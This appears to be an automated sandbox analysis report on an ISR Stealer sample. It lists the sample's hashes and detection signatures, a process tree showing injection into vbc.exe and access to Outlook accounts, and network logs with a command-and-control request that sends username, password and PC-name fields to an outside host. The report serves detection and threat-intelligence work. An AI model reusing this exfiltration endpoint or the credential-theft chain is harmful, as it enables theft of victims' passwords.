Analysis

  • max time kernel
    93s
  • max time network
    98s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/11/2022, 17:57 UTC

General

  • Target

    33f3c90640f81afc2210d3936ed94545817a1c5d87fb55e03d485bb760882803.exe

  • Size

    1010KB

  • MD5

    5a0ea1ccb0cddd973b3a35e70f7a5b17

  • SHA1

    6cbfef80043a991b73f62747450085ec30cd267f

  • SHA256

    33f3c90640f81afc2210d3936ed94545817a1c5d87fb55e03d485bb760882803

  • SHA512

    f2c4c1904685ef7b10d0996ff3a3b1efacfe16fe7ac2e0a960fbb69041b57358ec19c9d01fcd6f6537b06e77a218e948bb023598f91939bb8ffbce6520a29e65

  • SSDEEP

    24576:Y9ctReZNtnbkiWk9d8PSqiHa1YfMQvV7PnZY2n+c:1EZTYHkPkSfH4yMSRY2

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in Visual Basic.

  • ISR Stealer payload 6 IoCs
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\33f3c90640f81afc2210d3936ed94545817a1c5d87fb55e03d485bb760882803.exe
    "C:\Users\Admin\AppData\Local\Temp\33f3c90640f81afc2210d3936ed94545817a1c5d87fb55e03d485bb760882803.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:896
    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        /scomma "C:\Users\Admin\AppData\Local\Temp\xSMsKsmugl.ini"
        3⤵
        PID:1372
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\BTqvF4xAAg.ini"
          3⤵
          • Accesses Microsoft Outlook accounts
          PID:952

    Network

    • flag-unknown
      DNS
      www.legend2015.netai.net
      vbc.exe
      Remote address:
      8.8.8.8:53
      Request
      www.legend2015.netai.net
      IN A
      Response
      www.legend2015.netai.net
      IN A
      153.92.0.100
    • flag-unknown
      GET
      http://www.legend2015.netai.net/legend2015/PHP/index.php?action=add&username=&password=&app=&pcname=ZERMMMDR&sitename=
      vbc.exe
      Remote address:
      153.92.0.100:80
      Request
      GET /legend2015/PHP/index.php?action=add&username=&password=&app=&pcname=ZERMMMDR&sitename= HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: www.legend2015.netai.net
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Wed, 30 Nov 2022 00:58:28 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: keep-alive
      Location: https://www.000webhost.com/migrate?static=true
      X-Frame-Options: sameorigin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-unknown
      DNS
      www.000webhost.com
      vbc.exe
      Remote address:
      8.8.8.8:53
      Request
      www.000webhost.com
      IN A
      Response
      www.000webhost.com
      IN A
      104.19.184.120
      www.000webhost.com
      IN A
      104.19.185.120
    • flag-unknown
      GET
      https://www.000webhost.com/migrate?static=true
      vbc.exe
      Remote address:
      104.19.184.120:443
      Request
      GET /migrate?static=true HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: www.000webhost.com
      Connection: Keep-Alive
    • 153.92.0.100:80
      http://www.legend2015.netai.net/legend2015/PHP/index.php?action=add&username=&password=&app=&pcname=ZERMMMDR&sitename=
      http
      vbc.exe
      456 B
      643 B
      6
      4

      HTTP Request

      GET http://www.legend2015.netai.net/legend2015/PHP/index.php?action=add&username=&password=&app=&pcname=ZERMMMDR&sitename=

      HTTP Response

      301
    • 104.19.184.120:443
      https://www.000webhost.com/migrate?static=true
      tls, http
      vbc.exe
      954 B
      5.7kB
      10
      12

      HTTP Request

      GET https://www.000webhost.com/migrate?static=true
    • 8.8.8.8:53
      www.legend2015.netai.net
      dns
      vbc.exe
      70 B
      86 B
      1
      1

      DNS Request

      www.legend2015.netai.net

      DNS Response

      153.92.0.100

    • 8.8.8.8:53
      www.000webhost.com
      dns
      vbc.exe
      64 B
      96 B
      1
      1

      DNS Request

      www.000webhost.com

      DNS Response

      104.19.184.120
      104.19.185.120

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\xSMsKsmugl.ini

      Filesize

      5B

      MD5

      d1ea279fb5559c020a1b4137dc4de237

      SHA1

      db6f8988af46b56216a6f0daf95ab8c9bdb57400

      SHA256

      fcdcc2c46896915a1c695d6231f0fee336a668531b7a3da46178c80362546dba

      SHA512

      720e9c284f0559015312df7fe977563e5e16f48d3506e51eb4016adf7971924d352f740b030aa3adc81b6f65fd1dba12df06d10fa6c115074e5097e7ee0f08b3

    • memory/896-54-0x0000000075E31000-0x0000000075E33000-memory.dmp

      Filesize

      8KB

    • memory/896-55-0x0000000074C30000-0x00000000751DB000-memory.dmp

      Filesize

      5.7MB

    • memory/896-56-0x0000000074C30000-0x00000000751DB000-memory.dmp

      Filesize

      5.7MB

    • memory/896-66-0x0000000074C30000-0x00000000751DB000-memory.dmp

      Filesize

      5.7MB

    • memory/952-86-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/952-85-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/952-84-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/952-80-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1372-73-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1372-68-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1372-72-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1372-75-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1372-76-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/2032-79-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-74-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-62-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-60-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-58-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-57-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/2032-87-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB
